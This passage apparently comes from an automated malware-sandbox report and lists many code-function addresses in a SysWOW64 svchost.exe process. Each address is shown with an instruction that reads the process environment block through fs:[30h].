            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5A390 mov eax, dword ptr fs:[00000030h]2_2_02F5A390
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5A390 mov eax, dword ptr fs:[00000030h]2_2_02F5A390
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F31380 mov eax, dword ptr fs:[00000030h]2_2_02F31380
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F31380 mov eax, dword ptr fs:[00000030h]2_2_02F31380
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F31380 mov eax, dword ptr fs:[00000030h]2_2_02F31380
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F31380 mov eax, dword ptr fs:[00000030h]2_2_02F31380
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F31380 mov eax, dword ptr fs:[00000030h]2_2_02F31380
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4F380 mov eax, dword ptr fs:[00000030h]2_2_02F4F380
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4F380 mov eax, dword ptr fs:[00000030h]2_2_02F4F380
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4F380 mov eax, dword ptr fs:[00000030h]2_2_02F4F380
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4F380 mov eax, dword ptr fs:[00000030h]2_2_02F4F380
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4F380 mov eax, dword ptr fs:[00000030h]2_2_02F4F380
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4F380 mov eax, dword ptr fs:[00000030h]2_2_02F4F380
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEF38A mov eax, dword ptr fs:[00000030h]2_2_02FEF38A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE372 mov eax, dword ptr fs:[00000030h]2_2_02FAE372
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE372 mov eax, dword ptr fs:[00000030h]2_2_02FAE372
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE372 mov eax, dword ptr fs:[00000030h]2_2_02FAE372
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE372 mov eax, dword ptr fs:[00000030h]2_2_02FAE372
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB0371 mov eax, dword ptr fs:[00000030h]2_2_02FB0371
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB0371 mov eax, dword ptr fs:[00000030h]2_2_02FB0371
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5237A mov eax, dword ptr fs:[00000030h]2_2_02F5237A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3B360 mov eax, dword ptr fs:[00000030h]2_2_02F3B360
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3B360 mov eax, dword ptr fs:[00000030h]2_2_02F3B360
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3B360 mov eax, dword ptr fs:[00000030h]2_2_02F3B360
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3B360 mov eax, dword ptr fs:[00000030h]2_2_02F3B360
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3B360 mov eax, dword ptr fs:[00000030h]2_2_02F3B360
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3B360 mov eax, dword ptr fs:[00000030h]2_2_02F3B360
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E363 mov eax, dword ptr fs:[00000030h]2_2_02F6E363
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E363 mov eax, dword ptr fs:[00000030h]2_2_02F6E363
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E363 mov eax, dword ptr fs:[00000030h]2_2_02F6E363
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E363 mov eax, dword ptr fs:[00000030h]2_2_02F6E363
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E363 mov eax, dword ptr fs:[00000030h]2_2_02F6E363
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E363 mov eax, dword ptr fs:[00000030h]2_2_02F6E363
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E363 mov eax, dword ptr fs:[00000030h]2_2_02F6E363
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E363 mov eax, dword ptr fs:[00000030h]2_2_02F6E363
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A350 mov eax, dword ptr fs:[00000030h]2_2_02F6A350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F28347 mov eax, dword ptr fs:[00000030h]2_2_02F28347
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F28347 mov eax, dword ptr fs:[00000030h]2_2_02F28347
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F28347 mov eax, dword ptr fs:[00000030h]2_2_02F28347
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0300B2BC mov eax, dword ptr fs:[00000030h]2_2_0300B2BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0300B2BC mov eax, dword ptr fs:[00000030h]2_2_0300B2BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0300B2BC mov eax, dword ptr fs:[00000030h]2_2_0300B2BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0300B2BC mov eax, dword ptr fs:[00000030h]2_2_0300B2BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030032C9 mov eax, dword ptr fs:[00000030h]2_2_030032C9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F68322 mov eax, dword ptr fs:[00000030h]2_2_02F68322
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F68322 mov eax, dword ptr fs:[00000030h]2_2_02F68322
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F68322 mov eax, dword ptr fs:[00000030h]2_2_02F68322
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5332D mov eax, dword ptr fs:[00000030h]2_2_02F5332D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2E328 mov eax, dword ptr fs:[00000030h]2_2_02F2E328
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2E328 mov eax, dword ptr fs:[00000030h]2_2_02F2E328
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2E328 mov eax, dword ptr fs:[00000030h]2_2_02F2E328
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E310 mov eax, dword ptr fs:[00000030h]2_2_02F4E310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E310 mov eax, dword ptr fs:[00000030h]2_2_02F4E310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E310 mov eax, dword ptr fs:[00000030h]2_2_02F4E310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6631F mov eax, dword ptr fs:[00000030h]2_2_02F6631F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F29303 mov eax, dword ptr fs:[00000030h]2_2_02F29303
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F29303 mov eax, dword ptr fs:[00000030h]2_2_02F29303
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEF30A mov eax, dword ptr fs:[00000030h]2_2_02FEF30A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB330C mov eax, dword ptr fs:[00000030h]2_2_02FB330C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB330C mov eax, dword ptr fs:[00000030h]2_2_02FB330C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB330C mov eax, dword ptr fs:[00000030h]2_2_02FB330C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB330C mov eax, dword ptr fs:[00000030h]2_2_02FB330C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2C0F6 mov eax, dword ptr fs:[00000030h]2_2_02F2C0F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6D0F0 mov eax, dword ptr fs:[00000030h]2_2_02F6D0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6D0F0 mov ecx, dword ptr fs:[00000030h]2_2_02F6D0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F290F8 mov eax, dword ptr fs:[00000030h]2_2_02F290F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F290F8 mov eax, dword ptr fs:[00000030h]2_2_02F290F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F290F8 mov eax, dword ptr fs:[00000030h]2_2_02F290F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F290F8 mov eax, dword ptr fs:[00000030h]2_2_02F290F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4B0D0 mov eax, dword ptr fs:[00000030h]2_2_02F4B0D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2B0D6 mov eax, dword ptr fs:[00000030h]2_2_02F2B0D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2B0D6 mov eax, dword ptr fs:[00000030h]2_2_02F2B0D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2B0D6 mov eax, dword ptr fs:[00000030h]2_2_02F2B0D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2B0D6 mov eax, dword ptr fs:[00000030h]2_2_02F2B0D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03005149 mov eax, dword ptr fs:[00000030h]2_2_03005149
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEB0AF mov eax, dword ptr fs:[00000030h]2_2_02FEB0AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F700A5 mov eax, dword ptr fs:[00000030h]2_2_02F700A5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03003157 mov eax, dword ptr fs:[00000030h]2_2_03003157
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03003157 mov eax, dword ptr fs:[00000030h]2_2_03003157
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03003157 mov eax, dword ptr fs:[00000030h]2_2_03003157
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDF0A5 mov eax, dword ptr fs:[00000030h]2_2_02FDF0A5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDF0A5 mov eax, dword ptr fs:[00000030h]2_2_02FDF0A5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDF0A5 mov eax, dword ptr fs:[00000030h]2_2_02FDF0A5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDF0A5 mov eax, dword ptr fs:[00000030h]2_2_02FDF0A5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDF0A5 mov eax, dword ptr fs:[00000030h]2_2_02FDF0A5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDF0A5 mov eax, dword ptr fs:[00000030h]2_2_02FDF0A5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDF0A5 mov eax, dword ptr fs:[00000030h]2_2_02FDF0A5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2A093 mov ecx, dword ptr fs:[00000030h]2_2_02F2A093
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2C090 mov eax, dword ptr fs:[00000030h]2_2_02F2C090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F37072 mov eax, dword ptr fs:[00000030h]2_2_02F37072
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36074 mov eax, dword ptr fs:[00000030h]2_2_02F36074
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36074 mov eax, dword ptr fs:[00000030h]2_2_02F36074
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD9060 mov eax, dword ptr fs:[00000030h]2_2_02FD9060
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F31051 mov eax, dword ptr fs:[00000030h]2_2_02F31051
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F31051 mov eax, dword ptr fs:[00000030h]2_2_02F31051
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F60044 mov eax, dword ptr fs:[00000030h]2_2_02F60044
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030051B6 mov eax, dword ptr fs:[00000030h]2_2_030051B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2D02D mov eax, dword ptr fs:[00000030h]2_2_02F2D02D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72010 mov ecx, dword ptr fs:[00000030h]2_2_02F72010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F55004 mov eax, dword ptr fs:[00000030h]2_2_02F55004
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F55004 mov ecx, dword ptr fs:[00000030h]2_2_02F55004
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F38009 mov eax, dword ptr fs:[00000030h]2_2_02F38009
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F291F0 mov eax, dword ptr fs:[00000030h]2_2_02F291F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F291F0 mov eax, dword ptr fs:[00000030h]2_2_02F291F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F401F1 mov eax, dword ptr fs:[00000030h]2_2_02F401F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F401F1 mov eax, dword ptr fs:[00000030h]2_2_02F401F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F401F1 mov eax, dword ptr fs:[00000030h]2_2_02F401F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5F1F0 mov eax, dword ptr fs:[00000030h]2_2_02F5F1F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5F1F0 mov eax, dword ptr fs:[00000030h]2_2_02F5F1F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A1E3 mov eax, dword ptr fs:[00000030h]2_2_02F3A1E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A1E3 mov eax, dword ptr fs:[00000030h]2_2_02F3A1E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A1E3 mov eax, dword ptr fs:[00000030h]2_2_02F3A1E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A1E3 mov eax, dword ptr fs:[00000030h]2_2_02F3A1E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A1E3 mov eax, dword ptr fs:[00000030h]2_2_02F3A1E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF81EE mov eax, dword ptr fs:[00000030h]2_2_02FF81EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF81EE mov eax, dword ptr fs:[00000030h]2_2_02FF81EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5B1E0 mov eax, dword ptr fs:[00000030h]2_2_02F5B1E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5B1E0 mov eax, dword ptr fs:[00000030h]2_2_02F5B1E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5B1E0 mov eax, dword ptr fs:[00000030h]2_2_02F5B1E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5B1E0 mov eax, dword ptr fs:[00000030h]2_2_02F5B1E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5B1E0 mov eax, dword ptr fs:[00000030h]2_2_02F5B1E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5B1E0 mov eax, dword ptr fs:[00000030h]2_2_02F5B1E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5B1E0 mov eax, dword ptr fs:[00000030h]2_2_02F5B1E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F391E5 mov eax, dword ptr fs:[00000030h]2_2_02F391E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F391E5 mov eax, dword ptr fs:[00000030h]2_2_02F391E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F281EB mov eax, dword ptr fs:[00000030h]2_2_02F281EB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F401C0 mov eax, dword ptr fs:[00000030h]2_2_02F401C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F401C0 mov eax, dword ptr fs:[00000030h]2_2_02F401C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F451C0 mov eax, dword ptr fs:[00000030h]2_2_02F451C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F451C0 mov eax, dword ptr fs:[00000030h]2_2_02F451C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F451C0 mov eax, dword ptr fs:[00000030h]2_2_02F451C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F451C0 mov eax, dword ptr fs:[00000030h]2_2_02F451C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F631BE mov eax, dword ptr fs:[00000030h]2_2_02F631BE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F631BE mov eax, dword ptr fs:[00000030h]2_2_02F631BE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F641BB mov ecx, dword ptr fs:[00000030h]2_2_02F641BB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F641BB mov eax, dword ptr fs:[00000030h]2_2_02F641BB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F641BB mov eax, dword ptr fs:[00000030h]2_2_02F641BB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E1A4 mov eax, dword ptr fs:[00000030h]2_2_02F6E1A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E1A4 mov eax, dword ptr fs:[00000030h]2_2_02F6E1A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0300505B mov eax, dword ptr fs:[00000030h]2_2_0300505B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F59194 mov eax, dword ptr fs:[00000030h]2_2_02F59194
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F71190 mov eax, dword ptr fs:[00000030h]2_2_02F71190
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F71190 mov eax, dword ptr fs:[00000030h]2_2_02F71190
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F34180 mov eax, dword ptr fs:[00000030h]2_2_02F34180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F34180 mov eax, dword ptr fs:[00000030h]2_2_02F34180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F34180 mov eax, dword ptr fs:[00000030h]2_2_02F34180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004080 mov eax, dword ptr fs:[00000030h]2_2_03004080
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004080 mov eax, dword ptr fs:[00000030h]2_2_03004080
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004080 mov eax, dword ptr fs:[00000030h]2_2_03004080
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004080 mov eax, dword ptr fs:[00000030h]2_2_03004080
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004080 mov eax, dword ptr fs:[00000030h]2_2_03004080
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004080 mov eax, dword ptr fs:[00000030h]2_2_03004080
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004080 mov eax, dword ptr fs:[00000030h]2_2_03004080
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F8717A mov eax, dword ptr fs:[00000030h]2_2_02F8717A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F8717A mov eax, dword ptr fs:[00000030h]2_2_02F8717A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36179 mov eax, dword ptr fs:[00000030h]2_2_02F36179
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6716D mov eax, dword ptr fs:[00000030h]2_2_02F6716D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6415F mov eax, dword ptr fs:[00000030h]2_2_02F6415F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2A147 mov eax, dword ptr fs:[00000030h]2_2_02F2A147
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2A147 mov eax, dword ptr fs:[00000030h]2_2_02F2A147
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2A147 mov eax, dword ptr fs:[00000030h]2_2_02F2A147
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC314A mov eax, dword ptr fs:[00000030h]2_2_02FC314A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC314A mov eax, dword ptr fs:[00000030h]2_2_02FC314A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC314A mov eax, dword ptr fs:[00000030h]2_2_02FC314A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC314A mov eax, dword ptr fs:[00000030h]2_2_02FC314A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030050B7 mov eax, dword ptr fs:[00000030h]2_2_030050B7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEF13E mov eax, dword ptr fs:[00000030h]2_2_02FEF13E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBA130 mov eax, dword ptr fs:[00000030h]2_2_02FBA130
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F67128 mov eax, dword ptr fs:[00000030h]2_2_02F67128
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F67128 mov eax, dword ptr fs:[00000030h]2_2_02F67128
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2F113 mov eax, dword ptr fs:[00000030h]2_2_02F2F113
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2F113 mov eax, dword ptr fs:[00000030h]2_2_02F2F113
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2F113 mov eax, dword ptr fs:[00000030h]2_2_02F2F113
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2F113 mov eax, dword ptr fs:[00000030h]2_2_02F2F113
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2F113 mov eax, dword ptr fs:[00000030h]2_2_02F2F113
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2F113 mov eax, dword ptr fs:[00000030h]2_2_02F2F113
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2F113 mov eax, dword ptr fs:[00000030h]2_2_02F2F113
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2F113 mov eax, dword ptr fs:[00000030h]2_2_02F2F113
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2F113 mov eax, dword ptr fs:[00000030h]2_2_02F2F113
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2F113 mov eax, dword ptr fs:[00000030h]2_2_02F2F113
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2F113 mov eax, dword ptr fs:[00000030h]2_2_02F2F113
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2F113 mov eax, dword ptr fs:[00000030h]2_2_02F2F113
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2F113 mov eax, dword ptr fs:[00000030h]2_2_02F2F113
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2F113 mov eax, dword ptr fs:[00000030h]2_2_02F2F113
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2F113 mov eax, dword ptr fs:[00000030h]2_2_02F2F113
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2F113 mov eax, dword ptr fs:[00000030h]2_2_02F2F113
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2F113 mov eax, dword ptr fs:[00000030h]2_2_02F2F113
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2F113 mov eax, dword ptr fs:[00000030h]2_2_02F2F113
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2F113 mov eax, dword ptr fs:[00000030h]2_2_02F2F113
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2F113 mov eax, dword ptr fs:[00000030h]2_2_02F2F113
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2F113 mov eax, dword ptr fs:[00000030h]2_2_02F2F113
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F60118 mov eax, dword ptr fs:[00000030h]2_2_02F60118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5510F mov eax, dword ptr fs:[00000030h]2_2_02F5510F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5510F mov eax, dword ptr fs:[00000030h]2_2_02F5510F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5510F mov eax, dword ptr fs:[00000030h]2_2_02F5510F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5510F mov eax, dword ptr fs:[00000030h]2_2_02F5510F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5510F mov eax, dword ptr fs:[00000030h]2_2_02F5510F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5510F mov eax, dword ptr fs:[00000030h]2_2_02F5510F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5510F mov eax, dword ptr fs:[00000030h]2_2_02F5510F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5510F mov eax, dword ptr fs:[00000030h]2_2_02F5510F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5510F mov eax, dword ptr fs:[00000030h]2_2_02F5510F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5510F mov eax, dword ptr fs:[00000030h]2_2_02F5510F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5510F mov eax, dword ptr fs:[00000030h]2_2_02F5510F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5510F mov eax, dword ptr fs:[00000030h]2_2_02F5510F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5510F mov eax, dword ptr fs:[00000030h]2_2_02F5510F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3510D mov eax, dword ptr fs:[00000030h]2_2_02F3510D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAC6F2 mov eax, dword ptr fs:[00000030h]2_2_02FAC6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAC6F2 mov eax, dword ptr fs:[00000030h]2_2_02FAC6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F296E0 mov eax, dword ptr fs:[00000030h]2_2_02F296E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F296E0 mov eax, dword ptr fs:[00000030h]2_2_02F296E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3C6E0 mov eax, dword ptr fs:[00000030h]2_2_02F3C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F356E0 mov eax, dword ptr fs:[00000030h]2_2_02F356E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F356E0 mov eax, dword ptr fs:[00000030h]2_2_02F356E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F356E0 mov eax, dword ptr fs:[00000030h]2_2_02F356E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F566E0 mov eax, dword ptr fs:[00000030h]2_2_02F566E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F566E0 mov eax, dword ptr fs:[00000030h]2_2_02F566E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5D6D0 mov eax, dword ptr fs:[00000030h]2_2_02F5D6D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F306CF mov eax, dword ptr fs:[00000030h]2_2_02F306CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFA6C0 mov eax, dword ptr fs:[00000030h]2_2_02FFA6C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD86C2 mov eax, dword ptr fs:[00000030h]2_2_02FD86C2
